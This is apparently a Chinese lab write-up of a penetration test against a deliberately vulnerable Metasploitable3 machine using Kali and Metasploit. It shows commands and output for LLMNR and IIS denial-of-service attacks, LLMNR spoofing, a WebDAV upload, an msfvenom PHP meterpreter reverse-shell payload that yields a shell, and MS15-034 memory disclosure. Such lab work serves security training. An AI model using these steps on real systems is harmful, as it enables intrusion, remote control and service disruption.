渗透测试实例:Metasploitable3靶机
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20实验目的:对Metasploitable3靶机进行渗透测试实验步骤:(一),对靶机进行扫描1,使用Neuss对靶机进行扫描
·
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20
实验目的:对Metasploitable3靶机进行渗透测试
实验步骤:
(一),对靶机进行扫描
1,使用Neuss对靶机进行扫描
2,查看靶机服务是否正常运行
3,开启metasploit框架
使用nmtp对靶机进行扫描
msf6 > db_nmap -A -T4 192.168.22.20
(二),进行渗透
1,LLMNR缓冲区溢出DOS攻击
msf6 > search llmnr 根据提供的信息来查找相应的模块
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/llmnr/ms11_030_dnsapi 2011-04-12 normal No Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
1 auxiliary/scanner/llmnr/query normal No LLMNR Query
2 auxiliary/server/capture/smb normal No Authentication Capture: SMB
3 auxiliary/spoof/llmnr/llmnr_response normal No LLMNR Spoofer
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/spoof/llmnr/llmnr_response
msf6 > use auxiliary/dos/windows/llmnr/ms11_030_dnsapi 调用模块
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set 查看设置项
Global
======
No entries in data store.
Module: dos/windows/llmnr/ms11_030_dnsapi
=========================================
Name Value
---- -----
CHOST
CPORT
RHOSTS 224.0.0.252
RPORT 5355
VERBOSE false
WORKSPACE
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > show options 查看必要的设置
Module options (auxiliary/dos/windows/llmnr/ms11_030_dnsapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 224.0.0.252 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5355 yes The target port (UDP)
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set rhosts 192.168.22.20 指定攻击目标的IP地址
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > run 执行
[*] Running module against 192.168.22.20
[*] Sending Ipv6 LLMNR query to 192.168.22.20
[*] Sending Ipv4 LLMNR query to 192.168.22.20
[*] Note, in a default configuration, the service will restart automatically twice.
[*] In order to ensure it is completely dead, wait up to 5 minutes and run it again.
[*] Auxiliary module execution completed
2,llmnr欺骗(可进行监控)
msf6 > use auxiliary/spoof/llmnr/llmnr_response 调用模块
msf6 auxiliary(spoof/llmnr/llmnr_response) > set 查看设置项
Global
======
No entries in data store.
Module: spoof/llmnr/llmnr_response
==================================
Name Value
---- -----
GATEWAY_PROBE_HOST 8.8.8.8
GATEWAY_PROBE_PORT
INTERFACE
REGEX .*
SECRET 1297303073
SPOOFIP
TIMEOUT 500
TTL 30
VERBOSE false
WORKSPACE
msf6 auxiliary(spoof/llmnr/llmnr_response) > show options 查看必要的设置项
Module options (auxiliary/spoof/llmnr/llmnr_response):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
REGEX .* yes Regex applied to the LLMNR Name to determine if spoofed reply is sent
SPOOFIP yes IP address with which to poison responses
TIMEOUT 500 yes The number of seconds to wait for new data
TTL 30 no Time To Live for the spoofed response
Auxiliary action:
Name Description
---- -----------
Service Run LLMNR spoofing service
msf6 auxiliary(spoof/llmnr/llmnr_response) > set spoofip 192.168.22.20 设置攻击目标的IP地址
spoofip => 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > run 执行
[*] Auxiliary module running as background job 0.
msf6 auxiliary(spoof/llmnr/llmnr_response) >
[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX "(?-mix:.*)" ...
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > [+] 192.168.22.20 llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20 llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20 llmnr - metasploitable3. matches regex, responding with 192.168.22.20
先Ctrl+C退出
msf6 auxiliary(spoof/llmnr/llmnr_response) > jobs 查看后台进程
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Auxiliary: spoof/llmnr/llmnr_response
msf6 auxiliary(spoof/llmnr/llmnr_response) > kill 0 杀死后台的监控进程(否则会一直进行监控)
[*] Stopping the following job(s): 0
[*] Stopping job 0
3,APS栈耗尽拒绝服务攻击
msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > search Microsoft IIS 根据信息查找相应得到模块
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/iis_auth_bypass 2010-07-02 normal No MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
1 auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal No Microsoft IIS FTP Server Encoded Response Overflow Trigger
2 auxiliary/dos/windows/ftp/iis_list_exhaustion 2009-09-03 normal No Microsoft IIS FTP Server LIST Stack Exhaustion
3 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
4 auxiliary/scanner/http/iis_internal_ip normal No Microsoft IIS HTTP Internal IP Disclosure
5 auxiliary/scanner/http/iis_shortname_scanner normal Yes Microsoft IIS shortname vulnerability scanner
6 auxiliary/scanner/http/owa_iis_internal_ip 2012-12-17 normal No Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure
7 exploit/windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow
8 exploit/windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution
9 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
10 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
11 exploit/windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow
12 exploit/windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
13 exploit/windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
14 exploit/windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
15 exploit/windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
16 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
17 exploit/windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
18 exploit/windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow
19 exploit/windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
20 exploit/windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
21 exploit/windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
22 exploit/windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow
23 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
Interact with a module by name or index. For example info 23, use 23 or use exploit/windows/ssl/ms04_011_pct
msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 调用模块
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > show options 查看必要的设置
Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
URI /page.asp yes URI to request
VHOST no The virtual host name to use in requests
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rhosts 192.168.22.20 攻击目标的IP地址
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rport 8022 攻击目标的端口号
rport => 8022
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > run 执行
[*] Running module against 192.168.22.20
[*] 192.168.22.20:8022 - Attacking http://192.168.22.20:8022/page.asp
访问靶机的web页面感觉到明显的延时,并且靶机也产生卡顿,但是攻击并不稳定。
4,Microsoft IIS短名称漏洞扫描器
msf6 auxiliary(scanner/http/iis_internal_ip) > use auxiliary/scanner/http/iis_shortname_scanner 调用模块
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set 查看设置项
Global
======
No entries in data store.
Module: scanner/http/iis_shortname_scanner
==========================================
Name Value
---- -----
DOMAIN WORKSTATION
DigestAuthIIS true
FingerprintCheck true
HTTP::header_folding false
HTTP::method_random_case false
HTTP::method_random_invalid false
HTTP::method_random_valid false
HTTP::pad_fake_headers false
HTTP::pad_fake_headers_count 0
HTTP::pad_get_params false
HTTP::pad_get_params_count 16
HTTP::pad_method_uri_count 1
HTTP::pad_method_uri_type space
HTTP::pad_post_params false
HTTP::pad_post_params_count 16
HTTP::pad_uri_version_count 1
HTTP::pad_uri_version_type space
HTTP::uri_dir_fake_relative false
HTTP::uri_dir_self_reference false
HTTP::uri_encode_mode hex-normal
HTTP::uri_fake_end false
HTTP::uri_fake_params_start false
HTTP::uri_full_url false
HTTP::uri_use_backslashes false
HTTP::version_random_invalid false
HTTP::version_random_valid false
HttpClientTimeout
HttpPassword
HttpRawHeaders
HttpTrace false
HttpTraceColors red/blu
HttpTraceHeadersOnly false
HttpUsername
PATH /
Proxies
RHOSTS
RPORT 80
SSL false
SSLVersion Auto
THREADS 20
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
VERBOSE false
VHOST
WORKSPACE
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 192.168.22.20 攻击目标的IP地址
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/iis_shortname_scanner) > show options 查看必要的设置
Module options (auxiliary/scanner/http/iis_shortname_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base path to start scanning from
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.22.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 20 yes Number of threads to use
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run 执行
[*] Running module against 192.168.22.20
[*] Scanning in progress...
[+] Found 1 directories
[+] http://192.168.22.20/aspnet*~1
[+] Found 2 files
[+] http://192.168.22.20/index*~1.htm*
[+] http://192.168.22.20/six_of*~1.zip*
[*] Auxiliary module execution completed
5,DAVtest上传漏洞
┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/ 先上传文件
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.22.20:8585/uploads
********************************************************
NOTE Random string for this session: QlP180WUMS
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
********************************************************
Sending test files
PUT shtml SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT jhtml SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT asp SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT html SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT jsp SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT cgi SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT pl SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT txt SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT php SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT cfm SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT aspx SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
********************************************************
Checking for test file execution
EXEC shtml FAIL
EXEC jhtml FAIL
EXEC asp FAIL
EXEC html SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
EXEC jsp FAIL
EXEC cgi FAIL
EXEC pl FAIL
EXEC txt SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
EXEC php SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
EXEC cfm FAIL
EXEC aspx FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
┌──(root💀kali)-[~]
└─# msfvenom -p php/meterpreter-reverse_tcp LHOST=192.168.22.130 LPORT=888 -f raw >demon.php 生成攻击载荷(lhost是本机监听IP地址,lport是本机监听端口号)
┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_QlP180WUMS/8888.php 上传攻击载荷( DavTestDir_QlP180WUMS为访问网页上的路径)
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.22.20:8585/uploads
********************************************************
unless Uploading file
Upload succeeded: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/8888.php
msf6 > use exploit/multi/handler 调用模块
[*] Using configured payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 使用自己配置的payload
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.22.130 本机IP地址(需要和payload中相同)
lhost => 192.168.22.130
msf6 exploit(multi/handler) > set lport 888 本机监听地址(需要和payload中设置的相同)
lport => 888
msf6 exploit(multi/handler) > run 执行,(在执行后需点击上传的文件)
[*] Started reverse TCP handler on 192.168.22.130:888
msf6 exploit(multi/handler) > run 发现在点击web上上传的文件后渗透成功
[*] Started reverse TCP handler on 192.168.22.130:888
[*] Meterpreter session 2 opened (192.168.22.130:888 -> 192.168.22.20:55520) at 2021-02-08 17:42:08 +0800
meterpreter > ls 测试,已经拿到shell
Listing: C:\wamp\www\uploads\DavTestDir_QlP180WUMS
==================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 34280 fil 2021-02-08 17:32:37 +0800 8888.php
100666/rw-rw-rw- 44 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.asp
100666/rw-rw-rw- 44 fil 2021-02-08 15:29:24 +0800 davtest_QlP180WUMS.aspx
100666/rw-rw-rw- 42 fil 2021-02-08 15:29:24 +0800 davtest_QlP180WUMS.cfm
100666/rw-rw-rw- 66 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.cgi
100666/rw-rw-rw- 26 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.html
100666/rw-rw-rw- 37 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.jhtml
100666/rw-rw-rw- 37 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.jsp
100666/rw-rw-rw- 24 fil 2021-02-08 15:29:24 +0800 davtest_QlP180WUMS.php
100666/rw-rw-rw- 66 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.pl
100666/rw-rw-rw- 179 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.shtml
100666/rw-rw-rw- 19 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.txt
meterpreter >
6, HTTP协议栈请求处理。系统内存信息披露
msf6 > search ms15_034 查找相应模块
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options 查看必要选项
Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SUPPRESS_REQUEST true yes Suppress output of the requested resource
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.22.20 指定攻击目标IP地址
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run 执行
[+] Target may be vulnerable...
[+] Stand by...
[-] Memory dump start position not found, dumping all data instead
[+] Memory contents:
48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 |HTTP/1.1 400 Bad|
20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e | Request..Conten|
74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d |t-Type: text/htm|
6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 |l; charset=us-as|
63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 |cii..Server: Mic|
72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32 |rosoft-HTTPAPI/2|
2e 30 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 |.0..Date: Mon, 0|
38 20 46 65 62 20 32 30 32 31 20 31 30 3a 31 33 |8 Feb 2021 10:13|
3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 |:04 GMT..Connect|
69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 |ion: close..Cont|
65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 36 0d |ent-Length: 346.|
0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d |...<!DOCTYPE HTM|
4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 |L PUBLIC "-//W3C|
2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f |//DTD HTML 4.01/|
2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e |/EN""http://www.|
77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f |w3.org/TR/html4/|
73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 |strict.dtd">..<H|
54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 |TML><HEAD><TITLE|
3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 |>Bad Request</TI|
54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 |TLE>..<META HTTP|
2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d |-EQUIV="Content-|
54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 |Type" Content="t|
65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 |ext/html; charse|
74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 |t=us-ascii"></HE|
41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 |AD>..<BODY><h2>B|
61 64 20 52 65 71 75 65 73 74 20 2d 20 52 65 71 |ad Request - Req|
75 65 73 74 20 54 6f 6f 20 4c 6f 6e 67 3c 2f 68 |uest Too Long</h|
32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 |2>..<hr><p>HTTP |
45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 73 |Error 400. The s|
69 7a 65 20 6f 66 20 74 68 65 20 72 65 71 75 65 |ize of the reque|
73 74 20 68 65 61 64 65 72 73 20 69 73 20 74 6f |st headers is to|
6f 20 6c 6f 6e 67 2e 3c 2f 70 3e 0d 0a 3c 2f 42 |o long.</p>..</B|
4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a |ODY></HTML>..|
[+] Memory dump saved to /root/.msf4/loot/20210208181305_default_192.168.22.20_iis.ms15034_283153.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
7,HTTP协议栈请求处理拒绝服务
msf6 > search ms15_034 查看相应模块
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > show options 查看必要的设置
Module options (auxiliary/dos/http/ms15_034_ulonglongadd):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.22.20 指定攻击目标IP地址
rhosts => 192.168.22.20
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run 执行
[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) >
[*] 192.168.22.20 - Meterpreter session 2 closed. Reason: Died
【至此,渗透测试Metasploitable3靶机实验完成】
华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。
更多推荐
5
0- 0
已为社区贡献14条内容
所有评论(0)